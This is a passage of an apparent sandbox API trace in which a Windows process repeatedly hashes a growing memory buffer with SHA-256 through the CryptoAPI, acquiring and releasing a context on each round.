	[0201.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8f70
	[0201.743] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8f70, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8f70, pdwDataLen=0x129424) returned 1
	[0201.743] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.743] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.743] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.743] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.743] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0201.743] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8f98
	[0201.743] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8f98, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8f98, pdwDataLen=0x129424) returned 1
	[0201.743] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.744] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.744] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.744] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.744] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0201.744] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8fc0
	[0201.744] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c8fc0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8fc0, pdwDataLen=0x129424) returned 1
	[0201.744] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.744] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.744] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.744] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.744] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0201.744] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.744] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c8fe8
	[0201.745] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c8fe8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c8fe8, pdwDataLen=0x129424) returned 1
	[0201.745] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.745] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.745] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.745] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.745] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0201.745] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9010
	[0201.745] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9010, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9010, pdwDataLen=0x129424) returned 1
	[0201.745] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.745] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.745] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.745] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.745] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0201.746] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.746] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9038
	[0201.746] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9038, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9038, pdwDataLen=0x129424) returned 1
	[0201.746] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.746] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.746] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.746] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.746] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0201.746] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.746] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9060
	[0201.746] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9060, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9060, pdwDataLen=0x129424) returned 1
	[0201.746] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.746] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.746] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.747] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.747] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0201.747] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.747] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9088
	[0201.747] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9088, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9088, pdwDataLen=0x129424) returned 1
	[0201.747] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.747] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.747] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.747] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.747] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0201.747] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.747] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c90b0
	[0201.747] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c90b0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c90b0, pdwDataLen=0x129424) returned 1
	[0201.747] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.747] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.747] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.748] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.748] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0201.748] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.748] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c90d8
	[0201.748] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c90d8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c90d8, pdwDataLen=0x129424) returned 1
	[0201.748] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.748] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.748] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.748] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.748] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0201.748] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.748] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9100
	[0201.748] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9100, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9100, pdwDataLen=0x129424) returned 1
	[0201.748] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.748] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.748] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.749] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.749] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0201.749] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.749] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9128
	[0201.749] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9128, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9128, pdwDataLen=0x129424) returned 1
	[0201.749] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.749] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.749] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.749] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.749] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0201.749] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.749] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9150
	[0201.749] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9150, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9150, pdwDataLen=0x129424) returned 1
	[0201.749] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.749] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.749] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.750] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.750] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0201.750] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9178
	[0201.750] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9178, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9178, pdwDataLen=0x129424) returned 1
	[0201.750] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.750] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.750] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.750] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.750] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0201.750] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c91a0
	[0201.750] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c91a0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c91a0, pdwDataLen=0x129424) returned 1
	[0201.750] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.750] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.750] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.751] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.751] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0201.751] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.751] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c91c8
	[0201.751] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c91c8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c91c8, pdwDataLen=0x129424) returned 1
	[0201.751] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.751] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.751] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.751] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.751] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0201.751] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.751] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c91f0
	[0201.752] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c91f0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c91f0, pdwDataLen=0x129424) returned 1
	[0201.752] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.752] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.752] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.752] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.752] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0201.752] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.752] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9218
	[0201.752] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9218, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9218, pdwDataLen=0x129424) returned 1
	[0201.752] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.752] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.752] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.752] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.753] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0201.753] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.753] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9240
	[0201.753] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9240, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9240, pdwDataLen=0x129424) returned 1
	[0201.753] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.753] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.753] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.753] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.753] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0201.753] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.753] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9268
	[0201.753] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9268, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9268, pdwDataLen=0x129424) returned 1
	[0201.753] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.753] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.753] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.754] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.754] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0201.754] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.754] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9290
	[0201.754] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9290, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9290, pdwDataLen=0x129424) returned 1
	[0201.754] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.754] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.754] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.754] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.754] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0201.754] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.754] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c92b8
	[0201.754] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c92b8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c92b8, pdwDataLen=0x129424) returned 1
	[0201.754] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.754] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.754] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.755] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.755] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0201.755] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.755] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c92e0
	[0201.755] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c92e0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c92e0, pdwDataLen=0x129424) returned 1
	[0201.755] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.755] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.755] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.798] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.798] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0201.798] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9308
	[0201.798] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9308, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9308, pdwDataLen=0x129424) returned 1
	[0201.798] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.798] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.798] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.798] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.798] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0201.798] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9330
	[0201.798] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9330, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9330, pdwDataLen=0x129424) returned 1
	[0201.799] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.799] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.799] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.799] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.799] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0201.799] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.799] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9358
	[0201.799] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9358, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9358, pdwDataLen=0x129424) returned 1
	[0201.799] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.799] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.799] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.799] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
